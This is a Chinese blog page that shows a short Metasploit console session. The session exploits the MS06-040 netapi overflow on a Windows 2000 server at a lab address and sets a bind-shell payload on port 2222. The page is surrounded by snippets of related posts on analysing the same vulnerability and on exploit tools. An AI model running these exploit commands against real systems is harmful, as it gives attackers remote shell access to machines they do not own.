Ubuntu10.04下使用metasploit对win2000 server进行MS06-040溢出

最新推荐文章于 2019-08-31 19:43:00 发布
最新推荐文章于 2019-08-31 19:43:00 发布
阅读量2.3k 收藏
点赞数
分类专栏: Hacking 文章标签: ubuntu server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6773652
版权
msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.121.129
RHOST => 192.168.121.129
msf exploit(ms06_040_netapi) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(ms06_040_netapi) > set LPORT 2222
LPORT => 2222
msf exploit(ms06_040_netapi) > exploit
7禧
关注
专栏目录
[漏洞分析] 漏洞分析:MS06-040
m0_69551903的博客
04-13 1230
最近开始学习漏洞分析相关内容,完成对Windows相关安全机制的学习后,便是寻找实例进行练习,这MS06-040是一个经典的栈溢出漏洞,原理很好理解,在此分享一下自己的分析过程,希望对同样是漏洞分析新手的同学有所帮助 漏洞存在于netapi32.dll中的导出函数NetpwPathCanonicalize()里,原型为: int NetpwPathCanonicalize ( uint16 path[ ], // [in] path name uint8 c...
深入浅出MS06-040
08-23 4195
 入浅出MS06-040时至今日,网上已有颇多MS06-040的文章,其中不乏精辟之作。与其相比,本文突显业余,技术上无法超越,徒逞口舌之快。本文适合有一定计算机基础,初步了解溢出攻击原理,稍微了解逆向技术的朋友阅读。如果您根据本文的指导亲手完成了全部的7节实验内容,相信您对栈溢出的掌握和漏洞利用的认识一定会到一个更高的level。实验中涉及的所有细节均可重现,使用的源代码都已经过详细的注
MS06-040漏洞研究(上)【转载】
weixin_30390075的博客
08-31 609
课程简介 我在之前的课程中讨论过W32Dasm这款软件中的漏洞分析与利用的方法,由于使用该软件的人群毕竟是小众群体,因此该漏洞的危害相对来说还是比较小的。但是如果漏洞出现在Windows系统中,那么情况就会很不一样了。毕竟Windows统治了全球九成以上的计算机操作系统,因此如果该系统中出现了漏洞,而这个漏洞又被别有用心者所利用,那么就必然会出现数以亿计的受害者。 课程介绍 ...
MS06-040漏洞研究(中)【转载】
weixin_30390075的博客
08-31 404
课程简介 经过上次的分析,我们已经知道了MS06-040漏洞的本质,那么这次我们就通过编程实现漏洞的利用。 课程介绍 实验环境: 操作机:Windows XP 实验工具: Tools Path IDA Pro ...
MS06-040 Remote Code Execution Proof of Concept
08-26 2085
 /* * MS06-040 Remote Code Execution Proof of Concept * * Ported by ub3r st4r aka iRP * --------------------------------------------------------------------- * Tested Against: *  Windows XP SP1 *  Win
Ubuntu10.04下Hadoop-0.20.2集群配置手册.doc
最新发布
09-18
Ubuntu10.04下Hadoop-0.20.2集群配置手册】 这篇文档主要介绍了如何在Ubuntu 10.04操作系统环境下配置Hadoop-0.20.2集群,包括集群的硬件环境准备、软件环境的搭建、SSH无密码验证以及Hadoop的配置步骤。 首先,...
ubuntu-10.04.4-desktop-i386.iso
01-29
ubuntu-10.04.4-desktop-i386.iso
ubuntu离线安装包ssh-server.zip
12-06
Ubuntu20.04离线安装openssh-server 安装步骤: sudo dpkg -i libssl1.0.0_1.0.2n-1ubuntu5.7_amd64.deb sudo dpkg -i openssh-client_8.4p1-6ubuntu1_amd64.deb sudo dpkg -i openssh-sftp-server_8.4p1-6ubuntu1_...
Ubuntu 10.04 安装配置手记.pdf
10-15
本文档记录了 Ubuntu 10.04 的安装配置过程,包括硬盘安装、Grub4Dos 安装、menu.lst 文件修改、ubuntu-10.04-alternate-i386.iso 文件复制、安装过程、系统通用配置等。 一、硬盘安装 Ubuntu 10.04 Alternate i386...
深入浅出MS06040(看雪网络版)
12-19
深入浅出分析漏洞MS06040,值得一看
ms06-040漏洞分析1
08-08
3. 漏洞利用漏洞的利用分为本地和远程两种,本地利用用于分析此导出函数存在的漏洞,在远程靠此漏洞进行恶意代码执行,进而控制存在此漏洞的主机 4. 漏洞影响此例中
MS06040漏洞扫描工具
06-17
MS06040漏洞扫描工具,若无法运行,尝试用windows2000兼容性运行。
ms12-020.exe/windows远程桌面溢出程序/远程蓝屏重启exploit
09-11
Usage: MS12-020.exe Remote_host_add Example: MS12-020.exe www.test.com MS12-020.exe 192.168.1.1 Source Code Copyright Silic Group Application Copyright Xiaomo.wabzsy
ubuntu10.04下安装svn server
11-08
下面我们将详细探讨如何在Ubuntu 10.04上安装、配置SVN服务器,并使用客户端进行操作。 首先,安装SVN服务器可以通过执行以下命令来完成: ```bash sudo apt-get install subversion ``` 安装完成后,你需要创建一...
MS06-040漏洞分析回顾
Walter的专栏
09-12 2866
1、利用现有win2000 sp4系统的netapi32.dll发现目前大多数系统已经打上补丁,带补丁的ida代码如下: signed int __stdcall NetpwPathCanonicalize(wchar_t *Str, wchar_t *lpWideCharStr, int a3, wchar_t *Source, int a5, int a6) {   wchar_t *v
0day安全 学习之 MS06-040 漏洞研究
qq_41071646的博客
08-13 768
最近在看 0day安全 这本书 然后打算 跟着去复现一下 以前大一也试着看看这本书 发现看的不是很懂 现在感觉 这本书真的写的很棒 然后 我看了前三章 感觉都还ok 然后看到 一个漏洞的时候发现有点手痒 然后配了一下环境 找了一下dll 然后跟着来做一下, 然后这里的思路是来自 姜大大的 https://blog.csdn.net/ioio_jy/article/details...
俺是这样修改ms06-040
lobenton的路边摊
08-21 2383
俺是这样修改ms06-040的---要代码的看看了文章作者:mika[EST]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)被人说了一顿,俺再也不敢申请什么精华了。昨天晚上他上俺屋里把俺笑话了一番,嫌俺笨。说加个shellcode还用得着自己重新写了,有现成的DD不用,简直是脱了**放**。我说:呸呸呸,**嘴里吐不出**来,你有更好的方法你教俺啊?结果他真教俺了,我看了看
Ubuntu10.04 教程:使用F-Spot管理照片
"Ubuntu10.04(lucid)中文教程_part3主要介绍了如何使用F-Spot照片管理器处理和管理图像。用户可以学习如何从计算机硬盘或数码相机导入照片,以及查看和管理这些照片的方法。" 在Ubuntu 10.04 (Lucid Lynx)操作系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值